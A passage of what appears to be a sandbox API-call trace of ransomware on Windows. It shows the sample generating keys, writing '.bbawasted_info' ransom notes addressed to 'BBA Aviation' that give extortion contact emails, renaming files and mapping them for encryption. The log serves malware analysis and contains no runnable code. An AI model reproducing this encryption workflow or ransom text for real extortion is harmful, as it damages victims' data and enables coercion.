dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0235.050] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0235.051] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xda3a [0235.051] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xda3a) returned 0x5f0000 [0235.051] CloseHandle (hObject=0x294) returned 1 [0235.053] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0235.054] CloseHandle (hObject=0x27c) returned 1 [0235.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb80 [0235.055] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6350) returned 1 [0235.057] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x6adbc8 | out: pbBuffer=0x6adbc8) returned 1 [0235.057] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0235.057] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6460) returned 1 [0235.058] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0235.058] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0235.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb80 | out: hHeap=0x660000) returned 1 [0235.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.070] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]q1HV0o38SjfGBSKbrafmqk+CV79YpMBHRJxIVe4YedYK9XVbGiGFhCe5jrKppyJ1\r\nWsjvfn+rSf0Y2BbGYi1bTBMuMX2rVl/0NMAChEbFN5ptwTzEWuVOKzUz/9XYcegh\r\npOADjQalZVV9cBUFGZLF/VdG/1W4ufHOhylK2jPke4vH/QMldybCO37H6rZkV1G3\r\nZ9KZGQFbsdhEyUz0Z5BgxZwiC/afgIr/jmRxs5dtB7r99bo+aWPCDtC8KUcjQEgn\r\nvvZzsRnCNhsrcUCSCT0x6Q7Ue+EzyUSZkP9mKCcrvJfJkaGtRcdi5ALUouVL4zLJ\r\nOaItLLnBn7IQFdj9TFEZva2gCVusZlCriFyM9ojbz/mrDyCK/u16/zxor7UCZP51\r\niZnc2zmRAGlyxONvAkgiyvSXJBgjfjxW2Z5Qx+o61ifi2flNnSQgOvztoko6ANQ8\r\n+Eia6EL5ho9/3kRVc32YJuuoZ/xSHEXBvwwsk4ZU+pKQwCbFMaL+Wc7XmDAepQzI\r\nJiXllLuGGzaQXnGtuM3SrjZxcp+zfxmkmeXyAV6w83ZgoQ2Ze+xDUNVC3iYvdIcH\r\n7GDHEUG8GLA4My/0Gb70ZKgvDYeEB0ABBcWmYTk8p+YWFqM69FfTLkEWTAZC9Cfv\r\nI18cltNkCzodkq5PpIsQQKm9DW0dyOHDKrTkRXtNOvd=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.070] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0235.070] SetEndOfFile (hFile=0x28c) returned 1 [0235.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.073] CloseHandle (hObject=0x28c) returned 1 [0235.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0235.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b73b0 | out: hHeap=0x660000) returned 1 [0235.104] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6c58) returned 1 [0235.107] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0235.107] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0235.107] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css") returned 53 [0235.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6ad900 [0235.107] lstrcpyW (in: lpString1=0x6ad96a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.107] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5e88) returned 1 [0235.108] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.108] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0235.108] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.css.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0235.109] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.110] SetEndOfFile (hFile=0x28c) returned 1 [0235.110] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.110] lstrcpyW (in: lpString1=0x6ad96a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.110] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.css"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.css.bbawasted")) returned 1 [0235.111] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.css.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0235.112] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0235.112] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1468 [0235.112] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1468) returned 0x5f0000 [0235.112] CloseHandle (hObject=0x27c) returned 1 [0235.151] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0235.151] CloseHandle (hObject=0x294) returned 1 [0235.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb80 [0235.152] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6680) returned 1 [0235.153] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x6adbc8 | out: pbBuffer=0x6adbc8) returned 1 [0235.153] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0235.153] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6bd0) returned 1 [0235.153] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0235.153] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0235.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb80 | out: hHeap=0x660000) returned 1 [0235.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.163] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]DYeW9ytzEmFD+/O1XnS/sbhCP62Y/BNsSKsehf+2dZe/pR+LUlBda1bZJG8RrUAG\r\nXTBOAiTwNE8GVmfaNi/+bIB5bEHU2sCHPcoVGe8H9aNz4N0gyuu+H0R04ksVqO41\r\nd4gDwS4OW3SDLikMKlkvUOY59Tc9e0TAdmkMERhtgZXgtEV7rjm1pE4HbZVZrzRg\r\nld2paRbpgWR4gwGyPErinyv9SuDcSFh3ihO3uXwyLck98AKFJYMlW/nPe+xzmTXs\r\n8uVrMfSa0u/2KiKxRqt0C9uFn4d/OJ+7eYsmpRo2aXbYOWR3x2dqIlXxcl+yJ0gQ\r\nUbP935CBa1HTNyj2u6arFZZCWJG7s0IKQcXubwC3pbB2gAG5W69cNErQxeKu+2kU\r\ni4LyccbncUsbqfyNzzRPQ5NcBc68teBuofgi84jw3WPa4BVqA+G7fhJXsgaxO9BP\r\najOg+/jrJUzm6tkIS/R/8IN2c3CLTQdPGeL+ELzA4YxD/LO0HacGHF0FBPeyCP+w\r\nPn5gSrTSoag17ZRDFZYwEfPjAWPDHnyUm2vA7hdu53PbybVdH5KtsBCxlZAKj2CL\r\nYmen9LZGXgaj7QtQefWOejHcRJ+G8tXfHcWA1+OvECisrl7WAIOCGVLSFJEb9GAP\r\nsNZAgDH48mUFdNlKsNBDuRviogFql+qyVJ8EdDI5mno=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.163] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0235.163] SetEndOfFile (hFile=0x28c) returned 1 [0235.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.166] CloseHandle (hObject=0x28c) returned 1 [0235.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0235.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7f68 | out: hHeap=0x660000) returned 1 [0235.167] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6708) returned 1 [0235.184] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0235.184] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0235.184] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm") returned 56 [0235.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0235.185] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.185] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6350) returned 1 [0235.186] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.186] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0235.186] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ar-sa.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0235.187] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.189] SetEndOfFile (hFile=0x28c) returned 1 [0235.189] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.189] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.189] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.189] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ar-sa.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ar-sa.htm.bbawasted")) returned 1 [0235.191] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ar-sa.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0235.191] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0235.191] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1af6d [0235.191] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1af6d) returned 0x640000 [0235.192] CloseHandle (hObject=0x294) returned 1 [0235.226] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0235.228] CloseHandle (hObject=0x27c) returned 1 [0235.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb88 [0235.228] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6240) returned 1 [0235.229] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x6adbd0 | out: pbBuffer=0x6adbd0) returned 1 [0235.229] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0235.229] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f10) returned 1 [0235.229] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0235.230] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0235.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb88 | out: hHeap=0x660000) returned 1 [0235.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.267] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]FbLquWjd8WcrVhY9BDrRbZwQv6g3kfoNxPQqmCvPtRGNru0hmaNfb/OIMF5KkU+F\r\nJnHzZOQOUHFPF1Mzh1NiPXsEBk3bnlqM3PRQCoUs+sp46V9CPgMNmeZemCby+Xyj\r\nnD0TlXucxLH4c1nF0759+k2sCHzhK5YqNzr2MtAfNHRCgu39IRjSYve7iMpKxRFp\r\n2vENrwbPCYB06T+2lPSN1i0kt4OhniBlWj/q6W7ZZXtgM1n13dq3OixG3/eQJx1T\r\nv/dDisW+CYxM38CLSpDcTlaceCiB6CB1StOPFc9DwpM69F6d+BbICezp4wE7SCf2\r\nijucVpiDZIcdn40foL2X57QSWPGvH/wmrgFpqUgd8rzg6nikE8ZuOJ1lL/k9mmlF\r\nYnN18tt7JPGZkkg6KhB0IRpopJGTOcXksBX2LAemh36sGtnjrFJW6ioij8Vj3Gpy\r\n1kq5fiXAcag/zS19BhREpES6qdEz5ugJAkfAzcvRf9M33MneNWT5V+pxqHgl9LtD\r\nCxZlg2vz1XOepJAOTsolUreKhCAz1x6lnTkWOVkZhkx3kRahadSiXym0MFu+JdJq\r\ntlZVQKN2GmB3MwAFEwrtkJ2S049JIjWht/F+bwCFbv6TlENQSxUXBS22env1I7IZ\r\nxk2lKrYQxCk4HeVt8ZcRQ5mpgXLWrkYTz/wWPnWX0SS=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.267] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0235.267] SetEndOfFile (hFile=0x28c) returned 1 [0235.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.270] CloseHandle (hObject=0x28c) returned 1 [0235.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0235.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa238 | out: hHeap=0x660000) returned 1 [0235.270] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6708) returned 1 [0235.271] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0235.271] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0235.271] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm") returned 56 [0235.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0235.271] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.271] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6680) returned 1 [0235.272] CryptGenRandom (in: hProv=0x6a6680, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.272] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0235.272] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_cs-cz.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0235.273] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.274] SetEndOfFile (hFile=0x28c) returned 1 [0235.274] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.274] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_cs-cz.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_cs-cz.htm.bbawasted")) returned 1 [0235.275] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_cs-cz.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0235.275] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0235.275] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x14573 [0235.275] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14573) returned 0x640000 [0235.275] CloseHandle (hObject=0x27c) returned 1 [0235.279] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0235.280] CloseHandle (hObject=0x280) returned 1 [0235.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb88 [0235.280] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a60a8) returned 1 [0235.280] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x1b8, pbBuffer=0x6adbd0 | out: pbBuffer=0x6adbd0) returned 1 [0235.280] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0235.281] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6928) returned 1 [0235.281] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0235.281] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0235.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb88 | out: hHeap=0x660000) returned 1 [0235.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.290] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE 